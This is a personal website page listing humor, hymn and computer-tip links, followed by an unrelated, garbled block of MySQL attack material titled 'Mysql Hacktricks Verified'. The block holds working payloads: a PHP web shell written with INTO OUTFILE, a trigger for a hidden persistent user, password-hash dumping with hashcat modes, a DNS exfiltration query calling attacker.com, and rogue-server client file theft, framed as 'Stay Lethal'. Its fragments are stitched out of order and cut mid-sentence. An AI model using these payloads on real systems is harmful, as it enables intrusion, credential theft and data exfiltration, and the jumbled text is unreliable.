Skip to content

XW

Humor

Reading Articles (Grad Student Humor)
Funny Analogies and Metaphors
Anagrams
Fundamental Differences Between Men and Women
How to Make Friends in the Weight Room
Hu's on First?
Learn Chinese in 5 Minutes
Subject: Airline Complaints
Things To Do In An Elevator
Asian-American Jokes
Stupid Shell Tricks

Creative

Afterparty Song for Mark's Wedding

Favorite Scriptures

Isaiah 53

Favorite Hymns

How Firm a Foundation
Come, Ye Sinners
Before the Throne of God Above
Love That Will Not Let Me Go

Computer Tips

MySQL Server Startup Error
Save for Web Doesn't Resize Image in Adobe Illustrator CS6
Exporting Transparent PNGs in Adobe Illustrator CS6
Time Machine Slow Backup
Aperture 3.4 crashing
Aperture to Flickr Photo Sizes
LinuxMint Touchpad/Wireless

Miscellaneous

Interesting Characters
Reading Log

Mysql Hacktricks Verified -

CREATE TRIGGER hide_user BEFORE INSERT ON mysql.user FOR EACH ROW BEGIN IF NEW.User = 'hidden' THEN SET NEW.password = PASSWORD('dontlog'); END IF; END; Note: Requires SUPER or TRIGGER privilege. | Goal | Best Method | Preconditions | |------|-------------|----------------| | Execute OS command | UDF sys_eval | FILE , write to plugin_dir, MySQL < 8.0 or custom compile | | Write shell | general_log file write | SUPER or file write perms | | Read files | LOAD_FILE() | FILE , file path within secure_file_priv or set to empty | | Dump hashes | SELECT authentication_string FROM mysql.user | SELECT on mysql.user | | Steal client files | Rogue MySQL server | Network access to victim's MySQL client | | Persistence | Hidden user + trigger | CREATE USER + TRIGGER | Conclusion: Stay Verified, Stay Lethal The difference between a script kiddie and a professional is verification. The mysql hacktricks verified approach means you do not blindly run commands—you understand the context, confirm the version, test the boundary, and then exploit with precision.

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php'; If OUTFILE fails due to newline issues, use INTO DUMPFILE with hex: mysql hacktricks verified

Use RogueMySQL or mysql-fake-server tools. The payload is: CREATE TRIGGER hide_user BEFORE INSERT ON mysql

Use hex encoding to avoid illegal characters. SELECT "&lt;

SELECT user, host, authentication_string FROM mysql.user; Use hashcat -m 300 for mysql_native_password (4 bytes salt + 20 bytes SHA1) or -m 7400 for caching_sha2_password.

SELECT LOAD_FILE(CONCAT('\\\\', (SELECT hex(version())), '.attacker.com\\test')); If error-based or union-based injection fails, try Time-based + DNS. But for direct DB access, use the sys_exec UDF to run nslookup or curl . Part 4: Lateral Movement and Credential Harvesting 4.1 Dumping Password Hashes MySQL stores credentials in mysql.user . Hash types: mysql_native_password (SHA1-based) or caching_sha2_password (MySQL 8+).

Your fake server sends a LOAD DATA LOCAL INFILE request during handshake. Vulnerable clients (e.g., old PHP mysqli with allow_local_infile=ON , MySQL Workbench, or outdated connectors) will send back any file the client user can read.